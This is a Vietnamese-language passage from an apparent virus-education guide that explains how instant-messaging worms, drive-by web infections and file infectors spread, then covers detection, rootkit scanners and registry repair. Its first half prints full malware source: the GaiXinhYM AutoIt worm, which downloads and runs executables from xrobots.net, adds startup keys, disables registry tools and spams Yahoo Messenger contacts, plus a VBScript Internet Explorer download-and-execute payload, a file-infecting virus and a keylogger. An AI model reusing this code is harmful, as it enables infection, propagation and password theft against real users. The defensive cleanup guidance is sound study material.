Nhắn tin nhanh (hay tin nhắn tức khắc, trò chuyện trực tuyến, chát - từ chat trong tiếng
Anh, IM viết tắt của Instant Messaging), là dịch vụ cho phép hai người trở lên nói chuyện
trực tuyến với nhau qua một mạng máy tính.
Mới hơn IRC, nhắn tin nhanh là trò chuyện mạng, phương pháp nói chuyện phổ biến hiện
nay. Nhắn tin nhanh dễ dùng hơn IRC, và có nhiều tính năng hay, như khả năng trò
chuyện nhóm, dùng biểu tượng xúc cảm, truyền tập tin, tìm dịch vụ và cấu hình dễ dàng
bản liệt kê bạn bè.
Nhắn tin nhanh đã thúc đẩy sự phát triển của Internet trong đầu thập niên 2000.
Giao thức - phần mềm

Có nhiều cách để thực hiện nhắn tin nhanh, thông qua các dịch vụ như IRC, hay các dịch
vụ của Yahoo!, Microsoft, do nhắn tin nhanh hỗ trợ rất nhiều giao thức khác nhau. Một số
người dùng bị giới hạn vì sử dụng ứng dụng khách chỉ truy cập một giao thức/mạng IM,
như MSN hay Yahoo!.
Một giao thức phổ biến đó là giao thức XMPP (Jabber). Đây là giao thức mở, an toàn, và
máy chủ nào hỗ trợ giao thức này đều có thể kết nối được với nhau. Ứng dụng khách
Jabber có khả năng truy cập mọi giao thức/mạng IM: MSN Messenger, Yahoo!, AIM, ICQ,
Gadu-Gadu, ngay cả IRC và SMS. Chỉ một chương trình Jabber có thể nói chuyện với bạn
bè trên mọi mạng.
Có một số ứng dụng khách Jabber là phần mềm tự do đa nền tảng và đã dịch sang tiếng
Việt Psi, Gaim và JWChat. Cũng có Gossip dành cho hệ điều hành Linux/UNIX.
Ứng dụng nhắn tin nhanh có khả năng VoIP, nói chuyện trực tiếp qua máy tính, như điện
thoại.
Ở Việt Nam dịch vụ IM thông dụng nhất là dịch vụ của Yahoo!. Ở Việt Nam cũng đã có
những dịch vụ IM của riêng mình đó là VNN Messenger hay Zing (Tuy nhiên Zing Chat là
một hệ thống IM được Việt Hoá).
Trước đây, đã có nhiều virus lây lan bằng các dịch vụ nhắn tin (Chủ yếu là sử dụng IRC,
MSN hay Spyke) nhưng dạo này người dùng Việt Nam mới để ý đến chúng do cơn “dịch”
virus nội lây qua dịch vụ IM của Yahoo! mà khởi đầu là virus GaiXinhYM.
Cơn “dịch” này bắt đầu từ năm 2006 vả đến nay thì vẫn chưa hoàn toàn kết thúc. Hàng
trăm virus nội xuất hiện có cùng hình thức lây nhiễm qua dịch vụ nhắn tin này.
Tuy nhiên thao tác cơ bản khi chúng hoạt động thường chỉ gồm các thao tác sau :
1. Bạn nhiễm chúng ta sao ?

Bạn đang chat, hay đọc tin nhắn Offline. Bạn đọc 1 tin nhắn từ bạn của bạn, chứa một
đường dẫn nhìn vào “rất bình thường”. Bạn ấn chuột vào link ấy.
Sau đó trình duyệt web hiện lên và mở liên kết ấy và bạn nhiễm virus. Còn vấn đề tại sao
virus lại “chui” thành công vào máy tính của bạn thì bạn có thể đọc phần phương pháp lây
truyền ngay khi bạn truy cập trang web nào đó.
2. Tạo khoá khởi động
Virus đang chạy sẽ ghi thông tin để khởi động vào lần khởi động máy sau (Bạn có thể xem
lại ở phần Tạo khoá khởi động ).
3. Lây nhiễm
Cứ sau một khoảng thời gian nhất định (Có thể là vài phút, hoạt vài giờ). Virus xác định
xem vào lúc ấy người dùng có đang dùng Yahoo Messenger hay không.
Nếu có virus sẽ tự động giả lập liên tiếp nhiều sự kiện nhấn phím theo những phím nóng
để thực hiện một chức năng nhất định trên Yahoo Messenger.
Sau hàng loạt thao tác như vậy, thì kết quả là virus sẽ gửi 1 thông điệp mà virus quy định
đến các nick trong danh sách bạn (Friend List) của bạn.
Trong thông điệp này lại chứa những thông điệp và liên kết để khi người kia kích hoạt nó
thì lại bị nhiễm. Chu trình cứ thế mà tiếp tục.
4. Một số thao tác khác
Không phải bất kỳ virus lây qua IM nào cũng giống nhau, sau đây là một số thao tác khác
của chúng :
- Tìm cách kiểm tra cập nhật phiên bản mới.
- Tải thêm 1 virus khác.
- Lây theo các hình thức khác (Qua USB, đĩa mềm…)
Sau đây là đoạn code của 1 virus lây qua mạng IM của Yahoo! viết trên AutoIt (Mã nguồn
virus GaiXinhYM).
; <AUT2EXE VERSION: 3.1.1.112>
; --------------------------------------------------------------------------
--
; <AUT2EXE INCLUDE-START: C:\Documents and Settings\Hai
Long\Desktop\Robots.au3>
; --------------------------------------------------------------------------
--
; --------------------------------------------------------------------------
--
;
; AutoIt Version: 3.1.0
; Author: A.N.Other <myemail@nowhere.com>
;
; Script Function:
; Template AutoIt script.
;
; --------------------------------------------------------------------------
--
; Script Start - Add your code below here
$version = "1.0"
AutoItSetOption ("TrayIconHide","1")
InetGet ( "Http://xrobots.net/Gift/Robots.exe" ,@WindowsDir &
"\Messenger.exe" ,0,1)
sleep(3000)
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi
ndows\CurrentVersion\Run","Yahoo!!!","REG_SZ",@Win dowsDir &
"\Messenger.exe")
InetGet ( "Http://xrobots.net/Gift/Version.txt" ,@WindowsDir &

"\Version.txt" ,1,1)
sleep(5000)
$checkfile = FileExists ( @WindowsDir & "\Version.txt" )
if $checkfile = 1 then
$file = FileOpen (@WindowsDir & "\Version.txt",0 )
$read = FileRead($file,3)
FileClose($file)
if $read <> $version then
InetGet ( "Http://xrobots.net/Gift/Update.exe" ,@WindowsDir & "\Update.exe"
,1,1)
sleep (3000)
Run(@WindowsDir & "\Update.exe")
endif
endif
RegWrite("HKEY_CURRENT_USER\SOFTWARE\microsoft\Int ernet Explorer\Main",

"Start Page", "REG_SZ", "http://67.15.40.2/~tranphu/forumtp/")
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V
iew\YMSGR_Launchcast","content url","REG_SZ",
"http://xRobots.net/Gift/New/")
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz","content
url","REG_SZ", "http://vietnamnet.vn")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win
dows\CurrentVersion\Policies\System",
"DisableRegistryTools","REG_DWORD","1")
AutoItSetOption ("WinTitleMatchMode", "2")
$check = FileExists ( @WindowsDir &
"\pchealth\helpctr\binaries\msconfig.exe" )
if $check = 1 then
FileMove(@WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe"
,@WindowsDir &"\msconfig.exe" )
FileDelete (@WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe")
endif
;;Doan na`y xoa di de doan ma khong bi loi dung

;; xLuke
if ($count = 2) or ($count = 6) or ($count = 9) or ($count = 12) or ($count

= 15) or ($count = 18) or ($count = 21) or ($count = 24) or ($count = 27) or
($count = 30) then
$title = WinGetTitle("Yahoo! Messenger")
$wincheck = WinExists ($title)
ClipPut("Gai xinh ne , gai xinh ne : <a
href="http://xrobots.net/Gift/?file=Gaixinh.jpg" target="_blank"
rel="nofollow"
class="limitview">http://xrobots.net/Gift/?file=Gaixinh.jpg</a>")
if $wincheck = 1 then
BlockInput (1)
WinActivate($title)
send("!A")
send("M")
sleep(400)
send("{DOWN}")
send("{SHIFTDOWN}")
send("{DOWN 70}")
send("{enter}")
send("{LSHIFT}")
send("^v {ENTER}")
BlockInput (0)
endif
endif
Next
; -----------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: C:\Documents and Settings\Hai
Long\Desktop\Robots.au3>
; -----------------------------------------------------------------------
Phân tích các công việc mà virus thực hiện :

- Ghi khóa khởi động
- Tự động kiểm tra phiên bản, nếu có phiên bản mới hơn sẽ tự động tải bản đó về
- Sau một khoảng thời gian nhất định sẽ kiểm tra xem Yahoo Messenger có làm việc hay
không, nếu có sẽ tiến hành giả lập liên tiếp nhiều phím nóng để thực hiện việc gửi một
thông điệp có chứa liên kết chứa mã độc (Nếu trình duyệt trên máy người truy cập trang
web ấy vẫn còn cho chạy VBScript thì người dùng ấy sẽ bị nhiễm virus).
5. WEB
Bạn mới chỉ truy cập vào 1 trang web lạ. Bỗng nhiên bạn nhiễm virus. Nó làm bạn máy
tính bạn lộn xộn cả lên. Lúc này bạn vẫn không hiểu tại sao virus nhiễm vào máy bạn.
Phân này sẽ giúp bạn làm sáng tỏ điều này.
Thuở sơ khai, Internet chưa có hình ảnh, hoạt hoạ tươi đẹp như hôm nay. Do nhu cầu
trình diễn và nhiều ứng dụng trên trang web ngày càng mạnh, người ta đã xây dựng nên
các công cụ để phục vụ mục đích ấy. ActiveX hay các script xuất hiện vì các lý do ấy.
Tuy nhiên, những công cụ này cũng tạo ra những lỗ hổng bảo mật nguy hiểm.
Các virus Việt Nam đã sử dụng 1 lỗ hổng về mã VBScript của trình duyệt Internet Explorer
(Một trình duyệt web phổ biến ở Việt Nam) để lây nhiễm.
Sau đây là đoạn mã VBScript thực hiện việc cài virus vào máy người truy cập trang web :
<script language="VBScript">
on error resume next
dl = "Link virus"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="Tên lưu trong máy"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
Trong đó :
Link virus : Là đường dẫn nơi lưu trư virus.
Tên lưu trong máy : Là tên bản sẽ được lưu trong máy tính nạn nhân. Nếu ở đây chỉ có
tên thì mặc định virus sẽ được lưu vào thư mục hệ thống.
6. Qua file
Đây là cách lây nhiễm virus đã tồn tại rất lâu. Cách thức lây nhiễm cơ bản là virus sẽ thay
đổi nội dung file của bạn mà sau đó khi bạn hay người khác làm việc với file ấy thì bạn sẽ
nhiễm phải virus.
Trước đây, phần lớn virus file chỉ tìm cách lây nhiễm vào các file định dạng exe, pif, com,
bat… và virus Macro thay đổi cấu trúc các file văn bản (.doc của Word và .xls của Excel).
Nhưng theo tôi nhận thấy, gần đây đã có một số virus nhiễm vào file thông minh hơn.
Các virus marco hiện nay đã gần như hết đất sống, khi các công cụ diệt virus và của chính
hãng cung cấp phần mềm soạn thảo văn bản ngày càng chú ý đến dạng virus này.
Tuy nhiên, theo tôi nhận thấy, gần đây một số virus đã rất thông minh khi vẫn lây nhiễm
vào các định dạng doc và xls mà không cần sử dụng đến marco.
Một ví dụ cụ thể là virus Ukuran. Đây là virus phá hoại dữ liệu các file .DBF, .LDF, .MDF,
.BAK và thay đổi các file .doc và .xls . Virus thực tế đã không thay đổi cấu trúc file gốc mà
đã xoá file ấy đi và tạo 1 file mới cùng tên với file văn bản ấy với phần mở rộng là “.exe” .
Trong file mới này, virus đã chèn chính mình ở phía trên và phần dữ liệu của file văn bản ở
phía cuối file. Khi được kích hoạt, chúng sẽ tách dữ liệu của file văn bản ở cuối file để tạo
thành 1 file mới và cho người dùng làm việc trên file này.
Lúc này, file virus tạo là file thực thi chứ không phải là 1 file văn bản như ban đầu. Kẻ viết
virus đã rất thông minh khi để biểu tượng (Icon) của virus chính là biểu tượng của các file
văn bản tương ứng. Điều này làm người dùng nhầm lẫn file này chính là file văn bản mà
vô tình kích hoạt và nhiễm virus
Sau đây là đoạn mã của virus chèn dữ liệu của mình vào phái trên của các file .exe :
Option Explicit
Private victim As String
Private myarray() As Byte
Private varray As Byte
Private length As Long
Private chck As String
Const size As Integer = 18432

’18432 là dung lượng virus sau khi biên dịch
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Private Declare Function OpenProcess Lib "kernel32" _

(ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, _
ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" _
(ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" _
(ByVal hObject As Long) As Long
On Error Resume Next
Dim I As Long
Dim Free
Free = FreeFile
On Error GoTo Fin
‘Lưu toàn bộ dữ liệu của virus vào một biến

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
myarray = Space$(size)
Get #1, 1, myarray
Close #Free
‘Bắt đầu thực hiện việc liệt kê các file .exe tồn tại trong cùng thư mục
đang chứa virus
victim = Dir(App.Path & "\" & "*.EXE")
While victim <> ""
If LCase(App.Path & "\" & App.EXEName & ".exe") _

<> LCase(App.Path & "\" & App.EXEName & ".exe") Then
‘Lưu dữ liệu file sẽ bị lây nhiễm vào 1 biến

Open Victim For Binary Access Read As #Free
varray = Space(LOF(Free))
Get #1, 1, varray
Close #Free
chck = Mid(varray, Len(varray))

‘Kiểm tra ký tự cuối cùng của file (Nếu là “^”là đã bị nhiễm)
If LCase(chck) <> "^" Then
Open victim For Binary Access Write As #Free

Put #Free, 1, myarray
Put #Free, size, varray
Put #Free, LOF(Free) + 1, "^"
Close #Free
End If
Else
End If
Victim = Dir()
Wend
‘Lấy toàn bộ dữ liệu của file hiện tại (Trừ đi dung lượng của virus)
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
length = (LOF(Free) - size)
If Length > 0 Then
myarray = Space(length)
Get #Free, size, myarray
Close #Free
‘Đặt dữ liệu ban đầu (Dữ liệu khi chưa bị nhiễm virus) vào 1 file
Open App.Path & "\" & App.EXEName & ".tut" For Binary Access Write As #Free
Put #Free, , myarray
Close #Free
‘Chay file sạch (File ban đầu trước khi bị lây nhiễm)
idProg = Shell(App.Path & "\" & App.EXEName & ".tut", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
‘Lấy mã số chương trình đang chạy
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE

‘Chờ đợi cho đến khi chương trình kết thúc
DoEvents
GetExitCodeProcess hProg, iExit
Loop
On Error Resume Next
Kill App.Path & "\" & App.EXEName & ".tut"
‘Xóa file
Else
Close #Free
End If
End
Fin:
End Sub
Một số hoạt động phá hoại khác

Keylog
Ghi lại chuỗi phím gõ của người dùng. Nó có thể hữu ích cho việc tìm nguồn gốc lỗi sai
trong các hệ thống máy tính và đôi khi được dùng để đo năng suất làm việc của nhân viên
văn phòng. Các phần mềm kiểu này rất hữu dụng cho ngành luật pháp và tình báo - ví dụ,
cung cấp một phương tiện để lấy mật khẩu hoặc các khóa mật mã và nhờ đó qua mắt
được các thiết bị an ninh. Tuy nhiên, các phần mềm keylogger được phổ biến rộng rãi trên
Internet và bất cứ ai cũng có thể sử dụng cho mục đích lấy trộm mật khẩu và chìa khóa
mã hóa.
Sau đây là đoạn mã KeyLog căn bản :

Trong Module :
Public Const DT_CENTER = &H1
Public Const DT_WORDBREAK = &H10
Type RECT
Left As Long
Top As Long
Right As Long
Bottom As Long
End Type
Declare Function DrawTextEx Lib "user32" Alias "DrawTextExA" (ByVal hDC As
Long, ByVal lpsz As String, ByVal n As Long, lpRect As RECT, ByVal un As
Long, ByVal lpDrawTextParams As Any) As Long
Declare Function SetTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent
As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) As Long
Declare Function KillTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent
As Long) As Long
Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As
Integer
Declare Function SetRect Lib "user32" (lpRect As RECT, ByVal X1 As Long,
ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long
Global Cnt As Long, sSave As String, sOld As String, Ret As String
Dim Tel As Long
Function GetPressedKey() As String
For Cnt = 32 To 128
If GetAsyncKeyState(Cnt) <> 0 Then
GetPressedKey = Chr$(Cnt)
Exit For
End If
Next Cnt
End Function
Sub TimerProc(ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As
Long, ByVal lpTimerFunc As Long)
Ret = GetPressedKey
If Ret <> sOld Then
sOld = Ret
sSave = sSave + sOld
End If
End Sub
Trong Form :
Me.Caption = "Key Spy"
SetTimer Me.hwnd, 0, 1, AddressOf TimerProc
End Sub
Private Sub Form_Paint()
Dim R As RECT
Const mStr = "Nao bat dau go di khi ban an dau X de thoat ban se thay
bat ngo thu vi day."
Me.Cls
Me.ScaleMode = vbPixels
SetRect R, 0, 0, Me.ScaleWidth, Me.ScaleHeight
DrawTextEx Me.hDC, mStr, Len(mStr), R, DT_WORDBREAK Or DT_CENTER, ByVal
0&
End Sub
Private Sub Form_Resize()
Form_Paint
End Sub
Private Sub Form_Unload(Cancel As Integer)
KillTimer Me.hwnd, 0
MsgBox sSave
End Sub
BackDoor (Cửa hậu)

Cửa hậu là một phương pháp vượt qua thủ tục chứng thực người dùng thông thường hoặc
để giữ đường truy nhập từ xa tới một máy tính, trong khi cố gắng không bị phát hiện bởi
việc giám sát thông thường. Cửa hậu có thể có hình thức một chương trình được cài đặt,
hoặc có thể là một sửa đổi đối với một chương trình hợp pháp - đó là khi nó đi kèm với
Trojan.
Kỹ thuật này dựa vào sự kết nối giữa 2 máy tính với nhau (Với các ngôn ngữ bậc cáo
chúng ta có thể sử dụng control WinSock để thực hiện việc này dễ dàng).
Tống tiền
Một số loại phần mềm ác tính sử dụng một hệ thống mật mã hóa yếu (phá được) để mã
hóa dữ liệu thuộc về một cá nhân và đòi tiền chuộc thì mới khôi phục lại.
Phương thức thanh toán của kẻ điều khiển các loại virus này thường rất thông minh (Có
một vài kẻ bắt buộc người dùng phải mua một số món hang nhất định trên một đĩa chỉ
nào đó mà kẻ điều khiển quy định).
BotNet
Là một mạng lưới gồm nhiều máy tính đã bị nhiễm virus (Thường là worm, trojan) và bị
điều khiển từ xa. Các BotNet thường được kẻ điều khiển sử dụng để tấn công từ chối dịch
vụ (DDos) hay gửi thư rác (Spam) nhầm kiếm lợi cho mình.
Rootkit
Là bộ công cụ phần mềm che giấu sự tồn tại file nhưng thực ra nó vẫn hoạt động. Rootkit
thường được bên thứ ba (thường là kẻ xâm nhập) dùng sau khi chiếm được quyền truy
cập vào hệ thống máy tính. Các công cụ này thường nhằm để che dấu dữ liệu hệ thống,
tập tin hoặc tiến trình đang chạy, từ đó giúp cho kẻ xâm nhập duy trì quyền truy cập vào
hệ thống mà người dùng không biết. Rootkit có ở nhiều loại hệ điều hành như Linux,
Solaris và các phiên bản Microsoft Windows.
Chương 3 : Nhận dạng và tiêu diệt
I. Làm sao để nhận dạng virus ?

Theo nhiều tài liệu thì khi có một số dấu hiệu bất ổn như CPU phải làm việc liên tục ngay
cả khi bạn không làm gì, máy tính chạy chậm lại, khởi động một ứng dụng nào đó chậm,
máy tính khởi động chậm... thì đều có thể nghi ngờ là tồn tại virus trong máy.
Tuy nhiên, theo tôi quan dù quan điểm trên là không sai, nhưng với các máy tính hiện nay
thường cài rất nhiều ứng dụng. Một số chúng không phải khi nào cũng hoạt động mà đôi
lúc khi thỏa một số điều kiện nào đó thì chúng mới thực sự làm việc. Điều này làm cho
máy tính bạn không phải lúc nào cũng ổn định. Khởi động chậm có thể do nhiều tác nhân
như số chương trình khởi động quá nhiều, do một chương trình nào đó ngay khi khởi động
đã làm việc ngốn nhiều bộ nhớ, khởi động một ứng dụng nào đó chậm có thể do trong lúc
đó một chương trình khác đang sử dụng nhiều tài nguyên hệ thống...
Vì vậy chúng ta cần có cách nghĩ khác về vấn đề này. Theo cá nhân tôi, những dấu hiệu
bất ổn ở một máy tính bình thường sẽ là :
- Bị khóa Regedit, Task Manager, MSConfig.
- Có những tiếng trình và những chương trình khởi động cùng hệ thống lạ.
- Sự xuất hiện chức năng Autorun trên USB.
- Các chương trình (Có phần mở rộng .exe , .scr) có icon giống hình thư mục.
- Các chương trình có tên gần giống, hoặc giống như khác thư mục lưu trữ với một số
chương trình hệ thống.
- Đang chat thì tự nhiên phần mềm chúng ta đang chat ấy gửi những thông điệp lung tung
trong khi bạn không thực hiện.
Trong những phần tiếp theo, chúng ta sẽ dựa vào các yếu tố trên để diệt các loại virus.
Tuy nhiên, việc nhận dạng và tiêu diệt virus chủ yếu dựa vào kinh nghiệm nên những
hướng dẫn sau đây sẽ không đi vào nói rõ làm sao để biết chúng là virus? Mà chỉ hướng
dẫn các thao tác cần thiết để diệt virus.
II. Dừng hoạt động của virus
Khái niệm về tiến trình (Process)
Trong khoa học máy tính, tiến trình là một thực thể điều khiển đoạn mã lệnh có riêng một
không gian địa chỉ, có ngăn xếp (stack) riêng rẽ, có bảng chứa các số miêu tả file (file
descriptor) dược mở cùng tiến trình và đặc biệt là có một định danh PID (process
identifier) duy nhất trong toàn bộ hệ thống vào thời điểm tiến trình đang chạy.
Dừng hoạt động của virus
Để nhận dạng và diệt virus thì thao tác cơ bản là phải nhân ra tiến trình virus đang làm
việc và diệt các tiến trình này.
Công cụ cơ bản của Windows để quản lý các tiến trình là Task Manager (Nhấn tổ hợp phím
Ctrl+Alt+Delele rồi chọn thẻ Processes). Tuy nhiên công cụ này không thật hiệu quả.
Công cụ mà tôi sử dụng chủ yếu để quản lý tiến trình là ProcessXP.
Để tiêu diệt một tiến trình đang chạy trong ProcessXP bạn chọn vào tiến trình ấy rồi bấm
Delete hoặc chuột phải rồi chọn Kill process.
Khi bạn nghi ngờ máy tính mình đã nhiễm virus, bạn tiêu diệt hết các tiến trình của các
ứng dụng mình đang chạy. Tuy nhiên có một số process bạn không nên tiêu diệt, đó là
những tiến trình của hệ thống. Cụ thể trong máy tôi thì những tiến trình được đóng khung
sau là những tiến trình của hệ thống.
III. Quản lý các chương trình khởi động của hệ thống

Virus khởi động như thế nào
Thông thường các virus sẽ khởi động vào các các như đã nói ở phần trên. Một số không
nhiều virus chỉ bắt đầu khởi động khi bạn mở một ổ đĩa nào đó. Trong phần này tôi sẽ đề
cập đến cách ngắt các chương trình khởi động theo các cách đã tổng kết ở phần trên.
Trong việc nhận dạng và tiêu diệt thì phần quản lý các chương trình khởi động của hệ
thống chiếm vị trí quan trọng hang đầu.
Nhận dạng Rootkit

Rất khó nhận ra máy tính nào đó có bị nhiễm Rootkit hay không. Trong phần này tôi sẽ
giới thiệu một số phần mềm nhận dạng và tiêu diệt Rootkit và cả địa chỉ tải chúng.
F-Secure BlackLight
Là chương trình được giới hạn thời gian, có thể sớm tạm ngừng để chuyển sang F-Secure
Internet Security 2006. BlackLight có chế độ quét tỉ mỉ và làm sạch được nhiều file xâm
phạm trên hệ thống.
Download : http://www.f-secure.com
IceSword 1.22
Nhận dạng Rootkit nhanh chóng và dễ dàng tiêu diệt chúng. Không chỉ vậy, IceSword còn
hỗ trợ một số tính năng khác như: Hiệu chỉnh registry, quản lý file, quản lý kết nối...
Download : http://mail.ustc.edu.cn/~jfpan/download/IceSword122en.zip
RKDetector 2.0
Gồm hai ứng dụng riêng quét hệ thống file và các chương trình chạy tách biệt. RKDetector
không có khả năng linh hoạt và nhiều thành phần như các chương trình khác.
Download : http://www.rkdetector.com
Trend Micro RootkitBuster 1.6
Phiên bản độc lập, "khuyến mãi" của công nghệ quét rootkit tách ra từ sản phẩm thương
mại của Trend Micro. Hoạt động thực sự khá hiệu quả.
Download : http://www.trendmicro.com
RootkitRevealer 1.71
Một trong những công cụ dò tìm rootkit đầu tiên, bây giờ bị lu mờ bởi nhiều chương trình
khác tốt hơn, nhưng vẫn còn hoạt động tương đối ổn.
Download : www.microsoft.com/technet/sysinternals/utilities/RootkitRevealer.mspx
GEMR
Một công cụ nhận dạng và tiêu diệt Rootkit khá mạnh, ngoài ra còn cung cấp công cụ để
quản lý registry, quản lý file, quản lý các chương trình dịch vụ (Services), một công cụ
nhỏ để thay thế cửa sổ CMD của hệ điều hành và cả công cụ để chạy các dòng lệnh (Trên
VBS) nhằm sửa chữa Registry.
Download : http://www.gmer.net/gmer.zip
Do tính chất của mình, các công cụ nhận dạng và diệt RootKit trên đây không cần cahỵ
thường trực mà chỉ làm việc khi bạn sử dụng nó. Vì vậy bạn nên tải nhiều công cụ trong
máy mình để khi cần thiết sẽ sử dụng nhiều công cụ khác nhau để tiến hành quét hệ
thống để sự an toàn được cao hơn.
Quản lý các chương trình khởi động của hệ thống

Windows có sẵn một công cụ để quản lý các chương trình khởi đông cùng hệ điều hành là
MSConfig (Bạn chọn Start -> Run... -> Nhập vào msconfig rồi chọn OK, sau đó bạn
chọn thẻ Startup để quản lý các chương trình thông thường hoặc Services để quản lý các
chương trình dịch vụ.)
Tuy nhiên, cũng như phần mềm Task Manager có sẵn. MSConfig chưa phải là sự lựa chọn
tốt. Tôi dùng Autoruns để làm việc này.
Bạn có thể dễ dàng ngắt khóa khởi động của một chương trình bằng cách bỏ dấu chọn ở
khóa đó hoặc chọn khóa đó rồi ấn Delete.
Tuy nhiên, có một số địa chỉ tuyệt đối bạn không được ngắt. Lý do vì sao thì bạn có thể
xem lại phần nói về các khóa khởi động ở phần trên cuốn sách.
Các key chứa giá trị đường dẫn sẽ được khởi động ngay cả SafeMode (Và cả chế độ làm
việc thông thường) là :
HKEY_LOCAL_MACHINE \SOFTWARE\Microsoft\Windows
HKEY_LOCAL_MACHINE \SOFTWARE\Microsoft\Windows
Trong Autoruns bạn sẽ dễ dàng nhận ra 2 key này. Các giá trị mặc định của máy tính
thông thường là (Nếu đĩa C là phân vùng chứa hệ điều hành)
Với key Userinit : C:\Windows\system32\userinit.exe
Với key Shell : C:\Windows\Explorer.exe
Nếu máy tính bạn có những giá trị khác tức là máy tính bạn có “Vấn đề”. Bạn hãy nhập lại
các giá trị trên vào các key (Bạn có thể mở Registry bằng cách chọn Run, nhập regedit và
ấn Ok). Hoặc bạn có thể dùng bất kỳ phần mềm nào khác cho phép sửa chữa registry.
Tuy nhiên bạn cần chú ý, khi bạn chỉnh sửa mà virus vẫn đang hoạt động thì nhiều khả
năng sẽ không có tác dụng.
Nếu bạn trong một lần khởi động nào đó mà máy không tìm thấy tập tin lưu trong 2 khóa
này thì Windows sẽ tự động Log Out. Để xử lý vấn đề này, bạn có thể xem ở phần sau.
IV. Khôi phục hệ thống

Diệt virus chưa phải là tất cả, một số virus sẽ thay đổi và thậm chí phá hoại hệ thống của
bạn. Vì vậy mà sau khi diệt xong virus, bạn bắt buộc phải kiểm tra lại hệ thống và kiểm
tra lại một số thiết lập của hệ thống để máy tính có thể trở lại trạng thái trước khi nhiễm
virus.
Phục hồi các thư mục ẩn
Một số virus có một kiểu hành vi phá hoại khá lạ lùng đó là cấu hình tất cả các thư mục
trong máy tính chế độ ẩn (Hidden). Hoặc một số virus dùng icon giống hình thư mục,
chúng thiết lập chế độ ẩn cho các thư mục và chúng giả thư mục ấy (Virus này cũng thiết
lập lại hệ thống để bạn không nhìn thấy các thư mục hay tập tin ẩn khi dùng Windows
Explorer hay một số trình quản lý file khác), người dùng tưởng rằng đó là thư mục bình
thường (Như trước khi nhiễm virus) nên lại tiếp tục kích hoạt virus ấy.
Việc nhận dạng virus và diệt virus dạng giả thư mục này đã nói ở phần dưới của cuốn tài
liệu. Trong phần này chúng ta sẽ tìm cách phục hồi kiểu hiển thị ban đầu cho các thư mục
kia.
Có nhiều cách để bạn làm việc này :
1. Cách làm thủ công là bạn phục hồi lại việc xem được các file ẩn bằng Windows Explorer
rồi phục hồi bằng các thao tác : Nhấp chuột phải vào thư mục -> Chọn Properties -> Bỏ
dấu chọn Hidden rồi bấm Apply.
2. Dùng các phần mềm quan lý file có thể xem file hay tập tin ẩn và cho phép sửa đổi các
thuộc tính của chúng như : Far Mannager, Total Commander, Norton Commander.
Tuy nhiên việc bạn thiết lập như vậy khá vất vả, để nhanh chóng hơn bạn có thể dùng
phần mềm FixAttrb của Bkis để phục hồi lại thuộc tính cho các thư mục.
Chương trình có giao diện đơn giản và khả năng phục hồi dữ liệu rất nhanh.
Download : http://www.bkav.com.vn/home/Download/FixAttrb.exe
Phục hồi Task Manager-Regedit-MSConfig

Trước hết, bạn phải đảm bảo máy tính đã sạch virus, nếu không, mọi hành động sẽ là vô
nghĩa. Virus sẽ nhanh chóng nhận biết các thay đổi của bạn và tiếp tục điều chỉnh lại hệ
thống theo ý của chúng, còn nhanh hơn bạn rất nhiều lần.
1. Bị khoá Registry
Triệu chứng: Khi bấm Start > Run > gõ regedit chỉ nhận được một thông báo
"Registry editor has been disabled by your administrator".
Khắc phục: Mở Notepad ra, copy và dán đoạn mã này vào và save nó lại thành file
UnHookExec.inf
[Version]
Signature="$Chicago$"
Provider=Symantec
[DefaultInstall]
AddReg=UnhookRegKey
[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe ""%1"""
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\
System,DisableRegistryTools,0x00000020,0
Hoặc tải file này http://securityresponse.symantec.com/avcenter/UnHookExec.inf về sử
dụng luôn.
Sau khi lưu, nhấn chuột phải vào nó rồi chọn "Install". Nếu cần restart lại máy.
2. Mất Folder Option
Triệu chứng: Mở Explorer, tại Menu Tools, thấy biến mất menu Folder Option.
Khắc phục: Có 2 cách sau đây:
Cách 1
Bấm Start > Run gõ vào Regedit:
Nếu Registry bị khoá thì thực hiện theo phần 1.
Nếu mục Run bị khoá thì thực hiện theo phần 6 ở bên dưới.
Tìm đến khoá sau:
